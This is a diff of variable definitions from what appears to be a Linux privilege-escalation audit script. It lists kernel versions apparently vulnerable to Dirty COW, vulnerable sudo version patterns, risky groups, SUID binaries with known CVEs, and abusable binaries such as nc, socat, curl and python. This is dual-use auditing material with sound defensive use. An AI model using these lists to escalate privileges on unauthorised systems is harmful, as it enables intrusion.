+kernelDCW_Rhel5_2="2.6.18-128.29.1.el5|2.6.18-128.30.1.el5|2.6.18-128.31.1.el5|2.6.18-128.32.1.el5|2.6.18-128.35.1.el5|2.6.18-128.36.1.el5|2.6.18-128.37.1.el5|2.6.18-128.38.1.el5|2.6.18-128.39.1.el5|2.6.18-128.40.1.el5|2.6.18-128.41.1.el5|2.6.18-164.el5|2.6.18-164.2.1.el5|2.6.18-164.6.1.el5|2.6.18-164.9.1.el5|2.6.18-164.10.1.el5|2.6.18-164.11.1.el5|2.6.18-164.15.1.el5|2.6.18-164.17.1.el5|2.6.18-164.19.1.el5|2.6.18-164.21.1.el5|2.6.18-164.25.1.el5|2.6.18-164.25.2.el5|2.6.18-164.28.1.el5|2.6.18-164.30.1.el5|2.6.18-164.32.1.el5|2.6.18-164.34.1.el5|2.6.18-164.36.1.el5|2.6.18-164.37.1.el5|2.6.18-164.38.1.el5|2.6.18-194.el5|2.6.18-194.3.1.el5|2.6.18-194.8.1.el5|2.6.18-194.11.1.el5|2.6.18-194.11.3.el5|2.6.18-194.11.4.el5|2.6.18-194.17.1.el5|2.6.18-194.17.4.el5|2.6.18-194.26.1.el5|2.6.18-194.32.1.el5|2.6.18-238.el5|2.6.18-238.1.1.el5|2.6.18-238.5.1.el5|2.6.18-238.9.1.el5|2.6.18-238.12.1.el5|2.6.18-238.19.1.el5|2.6.18-238.21.1.el5|2.6.18-238.27.1.el5|2.6.18-238.28.1.el5|2.6.18-238.31.1.el5|2.6.18-238.33.1.el5|2.6.18-238.35.1.el5|2.6.18-238.37.1.el5|2.6.18-238.39.1.el5|2.6.18-238.40.1.el5|2.6.18-238.44.1.el5|2.6.18-238.45.1.el5|2.6.18-238.47.1.el5|2.6.18-238.48.1.el5|2.6.18-238.49.1.el5|2.6.18-238.50.1.el5|2.6.18-238.51.1.el5|2.6.18-238.52.1.el5|2.6.18-238.53.1.el5|2.6.18-238.54.1.el5|2.6.18-238.55.1.el5|2.6.18-238.56.1.el5|2.6.18-274.el5|2.6.18-274.3.1.el5|2.6.18-274.7.1.el5|2.6.18-274.12.1.el5" 
+kernelDCW_Rhel5_3="2.6.18-274.17.1.el5|2.6.18-274.18.1.el5|2.6.18-308.el5|2.6.18-308.1.1.el5|2.6.18-308.4.1.el5|2.6.18-308.8.1.el5|2.6.18-308.8.2.el5|2.6.18-308.11.1.el5|2.6.18-308.13.1.el5|2.6.18-308.16.1.el5|2.6.18-308.20.1.el5|2.6.18-308.24.1.el5|2.6.18-348.el5|2.6.18-348.1.1.el5|2.6.18-348.2.1.el5|2.6.18-348.3.1.el5|2.6.18-348.4.1.el5|2.6.18-348.6.1.el5|2.6.18-348.12.1.el5|2.6.18-348.16.1.el5|2.6.18-348.18.1.el5|2.6.18-348.19.1.el5|2.6.18-348.21.1.el5|2.6.18-348.22.1.el5|2.6.18-348.23.1.el5|2.6.18-348.25.1.el5|2.6.18-348.27.1.el5|2.6.18-348.28.1.el5|2.6.18-348.29.1.el5|2.6.18-348.30.1.el5|2.6.18-348.31.2.el5|2.6.18-371.el5|2.6.18-371.1.2.el5|2.6.18-371.3.1.el5|2.6.18-371.4.1.el5|2.6.18-371.6.1.el5|2.6.18-371.8.1.el5|2.6.18-371.9.1.el5|2.6.18-371.11.1.el5|2.6.18-371.12.1.el5|2.6.18-398.el5|2.6.18-400.el5|2.6.18-400.1.1.el5|2.6.18-402.el5|2.6.18-404.el5|2.6.18-406.el5|2.6.18-407.el5|2.6.18-408.el5|2.6.18-409.el5|2.6.18-410.el5|2.6.18-411.el5|2.6.18-412.el5" +kernelDCW_Rhel6_1="2.6.33.9-rt31.66.el6rt|2.6.33.9-rt31.74.el6rt|2.6.33.9-rt31.75.el6rt|2.6.33.9-rt31.79.el6rt|3.0.9-rt26.45.el6rt|3.0.9-rt26.46.el6rt|3.0.18-rt34.53.el6rt|3.0.25-rt44.57.el6rt|3.0.30-rt50.62.el6rt|3.0.36-rt57.66.el6rt|3.2.23-rt37.56.el6rt|3.2.33-rt50.66.el6rt|3.6.11-rt28.20.el6rt|3.6.11-rt30.25.el6rt|3.6.11.2-rt33.39.el6rt|3.6.11.5-rt37.55.el6rt|3.8.13-rt14.20.el6rt|3.8.13-rt14.25.el6rt|3.8.13-rt27.33.el6rt|3.8.13-rt27.34.el6rt|3.8.13-rt27.40.el6rt|3.10.0-229.rt56.144.el6rt|3.10.0-229.rt56.147.el6rt|3.10.0-229.rt56.149.el6rt|3.10.0-229.rt56.151.el6rt|3.10.0-229.rt56.153.el6rt|3.10.0-229.rt56.158.el6rt|3.10.0-229.rt56.161.el6rt|3.10.0-229.rt56.162.el6rt|3.10.0-327.rt56.170.el6rt|3.10.0-327.rt56.171.el6rt|3.10.0-327.rt56.176.el6rt|3.10.0-327.rt56.183.el6rt|3.10.0-327.rt56.190.el6rt|3.10.0-327.rt56.194.el6rt|3.10.0-327.rt56.195.el6rt|3.10.0-327.rt56.197.el6rt|3.10.33-rt32.33.el6rt|3.10.33-rt32.34.el6rt|3.10.33-rt32.43.el6rt|3.10.33-rt32.45.el6rt|3.10.33-rt32.51.el6rt|3.10.33-rt32.52.el6rt|3.10.5
8-rt62.58.el6rt|3.10.58-rt62.60.el6rt|2.6.32-71.7.1.el6|2.6.32-71.14.1.el6|2.6.32-71.18.1.el6|2.6.32-71.18.2.el6|2.6.32-71.24.1.el6|2.6.32-71.29.1.el6|2.6.32-71.31.1.el6|2.6.32-71.34.1.el6|2.6.32-71.35.1.el6|2.6.32-71.36.1.el6|2.6.32-71.37.1.el6|2.6.32-71.38.1.el6|2.6.32-71.39.1.el6|2.6.32-71.40.1.el6|2.6.32-131.0.15.el6|2.6.32-131.2.1.el6|2.6.32-131.4.1.el6|2.6.32-131.6.1.el6|2.6.32-131.12.1.el6" +kernelDCW_Rhel6_2="2.6.32-131.17.1.el6|2.6.32-131.21.1.el6|2.6.32-131.22.1.el6|2.6.32-131.25.1.el6|2.6.32-131.26.1.el6|2.6.32-131.28.1.el6|2.6.32-131.29.1.el6|2.6.32-131.30.1.el6|2.6.32-131.30.2.el6|2.6.32-131.33.1.el6|2.6.32-131.35.1.el6|2.6.32-131.36.1.el6|2.6.32-131.37.1.el6|2.6.32-131.38.1.el6|2.6.32-131.39.1.el6|2.6.32-220.el6|2.6.32-220.2.1.el6|2.6.32-220.4.1.el6|2.6.32-220.4.2.el6|2.6.32-220.4.7.bgq.el6|2.6.32-220.7.1.el6|2.6.32-220.7.3.p7ih.el6|2.6.32-220.7.4.p7ih.el6|2.6.32-220.7.6.p7ih.el6|2.6.32-220.7.7.p7ih.el6|2.6.32-220.13.1.el6|2.6.32-220.17.1.el6|2.6.32-220.23.1.el6|2.6.32-220.24.1.el6|2.6.32-220.25.1.el6|2.6.32-220.26.1.el6|2.6.32-220.28.1.el6|2.6.32-220.30.1.el6|2.6.32-220.31.1.el6|2.6.32-220.32.1.el6|2.6.32-220.34.1.el6|2.6.32-220.34.2.el6|2.6.32-220.38.1.el6|2.6.32-220.39.1.el6|2.6.32-220.41.1.el6|2.6.32-220.42.1.el6|2.6.32-220.45.1.el6|2.6.32-220.46.1.el6|2.6.32-220.48.1.el6|2.6.32-220.51.1.el6|2.6.32-220.52.1.el6|2.6.32-220.53.1.el6|2.6.32-220.54.1.el6|2.6.32-220.55.1.el6|2.6.32-220.56.1.el6|2.6.32-220.57.1.el6|2.6.32-220.58.1.el6|2.6.32-220.60.2.el6|2.6.32-220.62.1.el6|2.6.32-220.63.2.el6|2.6.32-220.64.1.el6|2.6.32-220.65.1.el6|2.6.32-220.66.1.el6|2.6.32-220.67.1.el6|2.6.32-279.el6|2.6.32-279.1.1.el6|2.6.32-279.2.1.el6|2.6.32-279.5.1.el6|2.6.32-279.5.2.el6|2.6.32-279.9.1.el6|2.6.32-279.11.1.el6|2.6.32-279.14.1.bgq.el6|2.6.32-279.14.1.el6|2.6.32-279.19.1.el6|2.6.32-279.22.1.el6|2.6.32-279.23.1.el6|2.6.32-279.25.1.el6|2.6.32-279.25.2.el6|2.6.32-279.31.1.el6|2.6.32-279.33.1.el6|2.6.32-279.34.1.el6|2.6.32-279.37.2.el6|2.6.32-279.39.1.el6" 
+kernelDCW_Rhel6_3="2.6.32-279.41.1.el6|2.6.32-279.42.1.el6|2.6.32-279.43.1.el6|2.6.32-279.43.2.el6|2.6.32-279.46.1.el6|2.6.32-358.el6|2.6.32-358.0.1.el6|2.6.32-358.2.1.el6|2.6.32-358.6.1.el6|2.6.32-358.6.2.el6|2.6.32-358.6.3.p7ih.el6|2.6.32-358.11.1.bgq.el6|2.6.32-358.11.1.el6|2.6.32-358.14.1.el6|2.6.32-358.18.1.el6|2.6.32-358.23.2.el6|2.6.32-358.28.1.el6|2.6.32-358.32.3.el6|2.6.32-358.37.1.el6|2.6.32-358.41.1.el6|2.6.32-358.44.1.el6|2.6.32-358.46.1.el6|2.6.32-358.46.2.el6|2.6.32-358.48.1.el6|2.6.32-358.49.1.el6|2.6.32-358.51.1.el6|2.6.32-358.51.2.el6|2.6.32-358.55.1.el6|2.6.32-358.56.1.el6|2.6.32-358.59.1.el6|2.6.32-358.61.1.el6|2.6.32-358.62.1.el6|2.6.32-358.65.1.el6|2.6.32-358.67.1.el6|2.6.32-358.68.1.el6|2.6.32-358.69.1.el6|2.6.32-358.70.1.el6|2.6.32-358.71.1.el6|2.6.32-358.72.1.el6|2.6.32-358.73.1.el6|2.6.32-358.111.1.openstack.el6|2.6.32-358.114.1.openstack.el6|2.6.32-358.118.1.openstack.el6|2.6.32-358.123.4.openstack.el6|2.6.32-431.el6|2.6.32-431.1.1.bgq.el6|2.6.32-431.1.2.el6|2.6.32-431.3.1.el6|2.6.32-431.5.1.el6|2.6.32-431.11.2.el6|2.6.32-431.17.1.el6|2.6.32-431.20.3.el6|2.6.32-431.20.5.el6|2.6.32-431.23.3.el6|2.6.32-431.29.2.el6|2.6.32-431.37.1.el6|2.6.32-431.40.1.el6|2.6.32-431.40.2.el6|2.6.32-431.46.2.el6|2.6.32-431.50.1.el6|2.6.32-431.53.2.el6|2.6.32-431.56.1.el6|2.6.32-431.59.1.el6|2.6.32-431.61.2.el6|2.6.32-431.64.1.el6|2.6.32-431.66.1.el6|2.6.32-431.68.1.el6|2.6.32-431.69.1.el6|2.6.32-431.70.1.el6" 
+kernelDCW_Rhel6_4="2.6.32-431.71.1.el6|2.6.32-431.72.1.el6|2.6.32-431.73.2.el6|2.6.32-431.74.1.el6|2.6.32-504.el6|2.6.32-504.1.3.el6|2.6.32-504.3.3.el6|2.6.32-504.8.1.el6|2.6.32-504.8.2.bgq.el6|2.6.32-504.12.2.el6|2.6.32-504.16.2.el6|2.6.32-504.23.4.el6|2.6.32-504.30.3.el6|2.6.32-504.30.5.p7ih.el6|2.6.32-504.33.2.el6|2.6.32-504.36.1.el6|2.6.32-504.38.1.el6|2.6.32-504.40.1.el6|2.6.32-504.43.1.el6|2.6.32-504.46.1.el6|2.6.32-504.49.1.el6|2.6.32-504.50.1.el6|2.6.32-504.51.1.el6|2.6.32-504.52.1.el6|2.6.32-573.el6|2.6.32-573.1.1.el6|2.6.32-573.3.1.el6|2.6.32-573.4.2.bgq.el6|2.6.32-573.7.1.el6|2.6.32-573.8.1.el6|2.6.32-573.12.1.el6|2.6.32-573.18.1.el6|2.6.32-573.22.1.el6|2.6.32-573.26.1.el6|2.6.32-573.30.1.el6|2.6.32-573.32.1.el6|2.6.32-573.34.1.el6|2.6.32-642.el6|2.6.32-642.1.1.el6|2.6.32-642.3.1.el6|2.6.32-642.4.2.el6|2.6.32-642.6.1.el6" +kernelDCW_Rhel7="3.10.0-229.rt56.141.el7|3.10.0-229.1.2.rt56.141.2.el7_1|3.10.0-229.4.2.rt56.141.6.el7_1|3.10.0-229.7.2.rt56.141.6.el7_1|3.10.0-229.11.1.rt56.141.11.el7_1|3.10.0-229.14.1.rt56.141.13.el7_1|3.10.0-229.20.1.rt56.141.14.el7_1|3.10.0-229.rt56.141.el7|3.10.0-327.rt56.204.el7|3.10.0-327.4.5.rt56.206.el7_2|3.10.0-327.10.1.rt56.211.el7_2|3.10.0-327.13.1.rt56.216.el7_2|3.10.0-327.18.2.rt56.223.el7_2|3.10.0-327.22.2.rt56.230.el7_2|3.10.0-327.28.2.rt56.234.el7_2|3.10.0-327.28.3.rt56.235.el7|3.10.0-327.36.1.rt56.237.el7|3.10.0-123.el7|3.10.0-123.1.2.el7|3.10.0-123.4.2.el7|3.10.0-123.4.4.el7|3.10.0-123.6.3.el7|3.10.0-123.8.1.el7|3.10.0-123.9.2.el7|3.10.0-123.9.3.el7|3.10.0-123.13.1.el7|3.10.0-123.13.2.el7|3.10.0-123.20.1.el7|3.10.0-229.el7|3.10.0-229.1.2.el7|3.10.0-229.4.2.el7|3.10.0-229.7.2.el7|3.10.0-229.11.1.el7|3.10.0-229.14.1.el7|3.10.0-229.20.1.el7|3.10.0-229.24.2.el7|3.10.0-229.26.2.el7|3.10.0-229.28.1.el7|3.10.0-229.30.1.el7|3.10.0-229.34.1.el7|3.10.0-229.38.1.el7|3.10.0-229.40.1.el7|3.10.0-229.42.1.el7|3.10.0-327.el7|3.10.0-327.3.1.el7|3.10.0-327.4.4.el7|3.10.0-327.4.5.el7|3.10.0-327.10.1.el7|3.10.0-327.13.1.el7|3.10.0-327.
18.2.el7|3.10.0-327.22.2.el7|3.10.0-327.28.2.el7|3.10.0-327.28.3.el7|3.10.0-327.36.1.el7|3.10.0-327.36.2.el7|3.10.0-229.1.2.ael7b|3.10.0-229.4.2.ael7b|3.10.0-229.7.2.ael7b|3.10.0-229.11.1.ael7b|3.10.0-229.14.1.ael7b|3.10.0-229.20.1.ael7b|3.10.0-229.24.2.ael7b|3.10.0-229.26.2.ael7b|3.10.0-229.28.1.ael7b|3.10.0-229.30.1.ael7b|3.10.0-229.34.1.ael7b|3.10.0-229.38.1.ael7b|3.10.0-229.40.1.ael7b|3.10.0-229.42.1.ael7b|4.2.0-0.21.el7"
+
+
+MyUID=`id -u $(whoami)`
+if [ `echo $MyUID` ]; then myuid=$MyUID; elif [ `id -u $(whoami) 2>/dev/null` ]; then myuid=`id -u $(whoami) 2>/dev/null`; elif [ `id 2>/dev/null | cut -d "=" -f 2 | cut -d "(" -f 1` ]; then myuid=`id 2>/dev/null | cut -d "=" -f 2 | cut -d "(" -f 1`; fi
+if [ $myuid -gt 2147483646 ]; then baduid="|$myuid"; fi
+idB="euid|egid$baduid"
+sudovB="[01].[012345678].[0-9]+|1.9.[01234]|1.9.5p1"
+
+mounted=`(mount -l || cat /proc/mounts || cat /proc/self/mounts) 2>/dev/null | grep "^/" | cut -d " " -f1 | tr '\n' '|'``cat /etc/fstab 2>/dev/null | grep -v "#" | grep -E '\W/\W' | awk '{print $1}'`
+if ! [ "$mounted" ]; then mounted="ImPoSSssSiBlEee"; fi #Don't let any blacklist to be empty
+mountG="swap|/cdrom|/floppy|/dev/shm"
+notmounted=`cat /etc/fstab 2>/dev/null | grep "^/" | grep -Ev "$mountG" | awk '{print $1}' | grep -Ev "$mounted" | tr '\n' '|'`"ImPoSSssSiBlEee"
+mountpermsB="\Wsuid|\Wuser|\Wexec"
+mountpermsG="nosuid|nouser|noexec"
+
+rootcommon="/init$|upstart-udev-bridge|udev|/getty|cron|apache2|java|tomcat|/vmtoolsd|/VGAuthService"
+
+groupsB="\(root\)|\(shadow\)|\(admin\)|\(video\)|\(adm\)|\(wheel\)|\(auth\)"
+groupsVB="\(sudo\)|\(docker\)|\(lxd\)|\(disk\)|\(lxc\)"
+knw_grps='\(lpadmin\)|\(cdrom\)|\(plugdev\)|\(nogroup\)' #https://www.togaware.com/linux/survivor/Standard_Groups.html
+mygroups=`groups 2>/dev/null | tr " " "|"`
+
+sidG1="/abuild-sudo$|/accton$|/allocate$|/ARDAgent|/arping$|/atq$|/atrm$|/authpf$|/authpf-noip$|/authopen$|/batch$|/bbsuid$|/bsd-write$|/btsockstat$|/bwrap$|/cacaocsc$|/camel-lock-helper-1.2$|/ccreds_validate$|/cdrw$|/chage$|/check-foreground-console$|/chrome-sandbox$|/chsh$|/cons.saver$|/crontab$|/ct$|/cu$|/dbus-daemon-launch-helper$|/deallocate$|/desktop-create-kmenu$|/dma$|/dma-mbox-create$|/dmcrypt-get-device$|/doas$|/dotlockfile$|/dotlock.mailutils$|/dtaction$|/dtfile$|/eject$|/execabrt-action-install-debuginfo-to-abrt-cache$|/execdbus-daemon-launch-helper$|/execdma-mbox-create$|/execlockspool$|/execlogin_chpass$|/execlogin_lchpass$|/execlogin_passwd$|/execssh-keysign$|/execulog-helper$|/exim4|/expiry$|/fdformat$|/fstat$|/fusermount$|/fusermount3$|/gnome-pty-helper$|/glines$|/gnibbles$|/gnobots2$|/gnome-suspend$|/gnometris$|/gnomine$|/gnotski$|/gnotravex$|/gpasswd$|/gpg$|/gpio$|/gtali|/.hal-mtab-lock$|/imapd$|/inndstart$|/kismet_cap_nrf_51822$|/kismet_cap_nxp_kw41z$|/kismet_cap_ti_cc_2531$|/kismet_cap_ti_cc_2540$|/kismet_cap_ubertooth_one$|/kismet_capture$|/kismet_cap_linux_bluetooth$|/kismet_cap_linux_wifi$|/kismet_cap_nrf_mousejack$|/ksu$|/list_devices$|/locate$|/lock$|/lockdev$|/lockfile$|/login_activ$|/login_crypto$|/
login_radius$|/login_skey$|/login_snk$|/login_token$|/login_yubikey$|/lpc$|/lpd$|/lpd-port$|/lppasswd$|/lpq$|/lpr$|/lprm$|/lpset$|/lxc-user-nic$|/mahjongg$|/mail-lock$|/mailq$|/mail-touchlock$|/mail-unlock$|/mksnap_ffs$|/mlocate$|/mlock$|/mount.cifs$|/mount.nfs$|/mount.nfs4$|/mtr$|/mutt_dotlock$" +sidG2="/ncsa_auth$|/netpr$|/netkit-rcp$|/netkit-rlogin$|/netkit-rsh$|/netreport$|/netstat$|/newgidmap$|/newtask$|/newuidmap$|/nvmmctl$|/opieinfo$|/opiepasswd$|/pam_auth$|/pam_extrausers_chkpwd$|/pam_timestamp_check$|/pamverifier$|/pfexec$|/ping$|/ping6$|/pmconfig$|/pmap$|/polkit-agent-helper-1$|/polkit-explicit-grant-helper$|/polkit-grant-helper$|/polkit-grant-helper-pam$|/polkit-read-auth-helper$|/polkit-resolve-exe-helper$|/polkit-revoke-helper$|/polkit-set-default-helper$|/postdrop$|/postqueue$|/poweroff$|/ppp$|/procmail$|/pstat$|/pt_chmod$|/pwdb_chkpwd$|/quota$|/rcmd|/remote.unknown$|/rlogin$|/rmformat$|/rnews$|/run-mailcap$|/sacadm$|/same-gnome$|screen.real$|/security_authtrampoline$|/sendmail.sendmail$|/shutdown$|/skeyaudit$|/skeyinfo$|/skeyinit$|/sliplogin|/slocate$|/smbmnt$|/smbumount$|/smpatch$|/smtpctl$|/snap-confine$|/sperl5.8.8$|/ssh-agent$|/ssh-keysign$|/staprun$|/startinnfeed$|/stclient$|/su$|/suexec$|/sys-suspend$|/sysstat$|/systat$|/telnetlogin$|/timedc$|/tip$|/top$|/traceroute6$|/traceroute6.iputils$|/trpt$|/tsoldtlabel$|/tsoljdslabel$|/tsolxagent$|/ufsdump$|/ufsrestore$|/ulog-helper$|/umount.cifs$|/umount.nfs$|/umount.nfs4$|/unix_chkpwd$|/uptime$|/userhelper$|/userisdnctl$|/usernetctl$|/utempter$|/utmp_update$|/uucico$|/uuglist$|/uuidd$|/uuname$|/uusched$|/uustat$|/uux$|/uuxqt$|/vmstat$|/vmware-user-suid-wrapper$|/vncserver-x11$|/volrmmount$|/w$|/wall$|/whodo$|/write$|/X$|/Xorg.wrap$|/Xsun$|/Xvnc$|/yppasswd$" + +#Rules: Start path " /", end path "$", divide path and vulnversion "%". 
SPACE IS ONLY ALLOWED AT BEGINNING, DONT USE IT IN VULN DESCRIPTION
+sidB="/apache2$%Read_root_passwd__apache2_-f_/etc/shadow\(CVE-2019-0211\)\
+ /at$%RTru64_UNIX_4.0g\(CVE-2002-1614\)\
+ /abrt-action-install-debuginfo-to-abrt-cache$%CENTOS 7.1/Fedora22
+ /chfn$%SuSE_9.3/10\
+ /chkey$%Solaris_2.5.1\
+ /chkperm$%Solaris_7.0_\
+ /chpass$%2Vulns:OpenBSD_6.1_to_OpenBSD 6.6\(CVE-2019-19726\)--OpenBSD_2.7_i386/OpenBSD_2.6_i386/OpenBSD_2.5_1999/08/06/OpenBSD_2.5_1998/05/28/FreeBSD_4.0-RELEASE/FreeBSD_3.5-RELEASE/FreeBSD_3.4-RELEASE/NetBSD_1.4.2\
+ /chpasswd$%SquirrelMail\(2004-04\)\
+ /dtappgather$%Solaris_7_<_11_\(SPARC/x86\)\(CVE-2017-3622\)\
+ /dtprintinfo$%Solaris_10_\(x86\)_and_lower_versions_also_SunOS_5.7_to_5.10\
+ /dtsession$%Oracle_Solaris_10_1/13_and_earlier\(CVE-2020-2696\)\
+ /eject$%FreeBSD_mcweject_0.9/SGI_IRIX_6.2\
+ /ibstat$%IBM_AIX_Version_6.1/7.1\(09-2013\)\
+ /kcheckpass$%KDE_3.2.0_<-->_3.4.2_\(both_included\)\
+ /kdesud$%KDE_1.1/1.1.1/1.1.2/1.2\
+ /keybase-redirector%CentOS_Linux_release_7.4.1708\
+ /login$%IBM_AIX_3.2.5/SGI_IRIX_6.4\
+ /lpc$%S.u.S.E_Linux_5.2\
+ /lpr$%BSD/OS2.1/FreeBSD2.1.5/NeXTstep4.x/IRIX6.4/SunOS4.1.3/4.1.4\(09-1996\)\
+ /mail.local$%NetBSD_7.0-7.0.1__6.1-6.1.5__6.0-6.0.6
+ /mount$%Apple_Mac_OSX\(Lion\)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8\
+ /movemail$%Emacs\(08-1986\)\
+ /mrinfo$%NetBSD_Sep_17_2002_https://securitytracker.com/id/1005234\
+ /mtrace$%NetBSD_Sep_17_2002_https://securitytracker.com/id/1005234\
+ /netprint$%IRIX_5.3/6.2/6.3/6.4/6.5/6.5.11\
+ /newgrp$%HP-UX_10.20\
+ /ntfs-3g$%Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others\(02-2017\)\
+ /passwd$%Apple_Mac_OSX\(03-2006\)/Solaris_8/9\(12-2004\)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1\(02-1997\)\
+ /pkexec$%Linux4.10_to_5.1.17\(CVE-2019-13272\)/rhel_6\(CVE-2011-1485\)\
+ /pppd$%Apple_Mac_OSX_10.4.8\(05-2007\)\
+ /pt_chown$%GNU_glibc_2.1/2.1.1_-6\(08-1999\)\
+ /pulseaudio$%\(Ubuntu_9.04/Slackware_12.2.0\)\
+ /rcp$%RedHat_6.2\
+ /rdist$%Solaris_10/OpenSolaris\
+ /rsh$%Apple_Mac_OSX_10.9.5/10.10.5\(09-2015\)\
+ /screen$%GNU_Screen_4.5.0\
+ /sdtcm_convert$%Sun_Solaris_7.0\
+ /sendmail$%Sendmail_8.10.1/Sendmail_8.11.x/Linux_Kernel_2.2.x_2.4.0-test1_\(SGI_ProPack_1.2/1.3\)\
+ /check_sudo_version$\
+ /sudoedit$%Sudo/SudoEdit_1.6.9p21/1.7.2p4/\(RHEL_5/6/7/Ubuntu\)/Sudo<=1.8.14\
+ /tmux$%Tmux_1.3_1.4_privesc\(CVE-2011-1496\)\
+ /traceroute$%LBL_Traceroute_\[2000-11-15\]\
+ /ubuntu-core-launcher$%Befre_1.0.27.1\(CVE-2016-1580\)\
+ /umount$%BSD/Linux\(08-1996\)\
+ /umount-loop$%Rocks_Clusters<=4.1\(07-2006\)\
+ /uucp$%Taylor_UUCP_1.0.6\
+ /XFree86$%XFree86_X11R6_3.3.x/4.0/4.x/3.3\(03-2003\)\
+ /xlock$%BSD/OS_2.1/DG/UX_7.0/Debian_1.3/HP-UX_10.34/IBM_AIX_4.2/SGI_IRIX_6.4/Solaris_2.5.1\(04-1997\)\
+ /xscreensaver%Solaris_11.x\(CVE-2019-3010\)\
+ /xorg$%Xorg_1.19_to_1.20.x\(CVE_2018-14665\)/xorg-x11-server<=1.20.3/AIX_7.1_\(6.x_to_7.x_should_be_vulnerable\)_X11.base.rte<7.1.5.32_and_\
+ /xterm$%Solaris_5.5.1_X11R6.3\(05-1997\)/Debian_xterm_version_222-1etch2\(01-2009\)"
+#To update sidVB: curl https://github.com/GTFOBins/GTFOBins.github.io/tree/master/_gtfobins 2>/dev/null | grep 'href="/GTFOBins/' | grep '.md">' | awk -F 'title="' '{print $2}' | cut -d '"' -f1 | cut -d "." -f1 | sed -e 's,^,/,' | sed -e 's,$,\$,' | tr '\n' '|'
+sidVB='/apt-get$|/apt$|/aria2c$|/arp$|/ash$|/awk$|/base32$|/base64$|/bash$|/bpftrace$|/bundler$|/busctl$|/busybox$|/byebug$|/cancel$|/cat$|/chmod$|/chown$|/chroot$|/cobc$|/composer$|/cp$|/cpan$|/cpulimit$|/crash$|/crontab$|/csh$|/curl$|/cut$|/dash$|/date$|/dd$|/dialog$|/diff$|/dmesg$|/dmsetup$|/dnf$|/docker$|/dpkg$|/easy_install$|/eb$|/ed$|/emacs$|/env$|/eqn$|/expand$|/expect$|/facter$|/file$|/find$|/finger$|/flock$|/fmt$|/fold$|/ftp$|/gawk$|/gcc$|/gdb$|/gem$|/genisoimage$|/ghc$|/ghci$|/gimp$|/git$|/grep$|/gtester$|/hd$|/head$|/hexdump$|/highlight$|/iconv$|/iftop$|/ionice$|/ip$|/irb$|/jjs$|/journalctl$|/jq$|/jrunscript$|/ksh$|/ksshell$|/ld$|/ldconfig$|/less$|/logsave$|/look$|/ltrace$|/lua$|/lwp-download$|/lwp-request$|/mail$|/make$|/man$|/mawk$|/more$|/mount$|/mtr$|/mv$|/mysql$|/nano$|/nawk$|/nc$|/nice$|/nl$|/nmap$|/node$|/nohup$|/nroff$|/nsenter$|/od$|/openssl$|/pdb$|/perl$|/pg$|/php$|/pic$|/pico$|/pip$|/pkexec$|/pry$|/puppet$|/python$|/rake$|/readelf$|/red$|/redcarpet$|/restic$|/rlogin$|/rlwrap$|/rpm$|/rpmquery$|/rsync$|/ruby$|/run-mailcap$|/run-parts$|/rview$|/rvim$|/scp$|/screen$|/script$|/sed$|/service$|/setarch$|/sftp$|/shuf$|/smbclient$|/socat$|/soelim$|/sort$|/sqlite3$|/ssh$|/start-stop-daemon$|/stdbuf$|/strace$|/strings$|/su$|/sysctl$|/systemctl$|/tac$|/tail$|/tar$|/taskset$|/tclsh$|/tcpdump$|/tee$|/telnet$|/tftp$|/time$|/timeout$|/tmux$|/top$|/ul$|/unexpand$|/uniq$|/unshare$|/uudecode$|/uuencode$|/valgrind$|/vi$|/view$|/vim$|/watch$|/wget$|/whois$|/wish$|/xargs$|/xxd$|/xz$|/yelp$|/yum$|/zip$|/zsh$|/zsoelim$|/zypper$'
+cfuncs='file|free|main|more|read|split|write'
+
+sudoVB="
\*|env_keep\+=LD_PRELOAD|apt-get$|apt$|aria2c$|arp$|ash$|awk$|base64$|bash$|busybox$|cat$|chmod$|chown$|cp$|cpan$|cpulimit$|crontab$|csh$|curl$|cut$|dash$|date$|dd$|diff$|dmesg$|dmsetup$|dnf$|docker$|dpkg$|easy_install$|ed$|emacs$|env$|expand$|expect$|facter$|file$|find$|flock$|fmt$|fold$|ftp$|gdb$|gimp$|git$|grep$|head$|ionice$|ip$|irb$|jjs$|journalctl$|jq$|jrunscript$|ksh$|ld.so$|less$|logsave$|ltrace$|lua$|mail$|make$|man$|more$|mount$|mtr$|mv$|mysql$|nano$|nc$|nice$|nl$|nmap$|node$|od$|openssl$|perl$|pg$|php$|pic$|pico$|pip$|puppet$|python$|readelf$|red$|rlwrap$|rpm$|rpmquery$|rsync$|ruby$|run-mailcap$|run-parts$|rvim$|scp$|screen$|script$|sed$|service$|setarch$|sftp$|smbclient$|socat$|sort$|sqlite3$|ssh$|start-stop-daemon$|stdbuf$|strace$|systemctl$|tail$|tar$|taskset$|tclsh$|tcpdump$|tee$|telnet$|tftp$|time$|timeout$|tmux$|ul$|unexpand$|uniq$|unshare$|vi$|vim$|watch$|wget$|wish$|xargs$|xxd$|yum$|zip$|zsh$|zypper$" +sudoB="$(whoami)|ALL:ALL|ALL : ALL|ALL|NOPASSWD|SETENV|/apache2|/cryptsetup|/mount" +sudoG="NOEXEC" + +sudocapsB="/apt-get|/apt|/aria2c|/arp|/ash|/awk|/base64|/bash|/busybox|/cat|/chmod|/chown|/cp|/cpan|/cpulimit|/crontab|/csh|/curl|/cut|/dash|/date|/dd|/diff|/dmesg|/dmsetup|/dnf|/docker|/dpkg|/easy_install|/ed|/emacs|/env|/expand|/expect|/facter|/file|/find|/flock|/fmt|/fold|/ftp|/gdb|/gimp|/git|/grep|/head|/ionice|/ip|/irb|/jjs|/journalctl|/jq|/jrunscript|/ksh|/ld.so|/less|/logsave|/ltrace|/lua|/mail|/make|/man|/more|/mount|/mtr|/mv|/mysql|/nano|/nc|/nice|/nl|/nmap|/node|/od|/openssl|/perl|/pg|/php|/pic|/pico|/pip|/puppet|/python|/readelf|/red|/rlwrap|/rpm|/rpmquery|/rsync|/ruby|/run-mailcap|/run-parts|/rvim|/scp|/screen|/script|/sed|/service|/setarch|/sftp|/smbclient|/socat|/sort|/sqlite3|/ssh|/start-stop-daemon|/stdbuf|/strace|/systemctl|/tail|/tar|/taskset|/tclsh|/tcpdump|/tee|/telnet|/tftp|/time|/timeout|/tmux|/ul|/unexpand|/uniq|/unshare|/vi|/vim|/watch|/wget|/wish|/xargs|/xxd|/yum|/zip|/zsh|/zypper" 
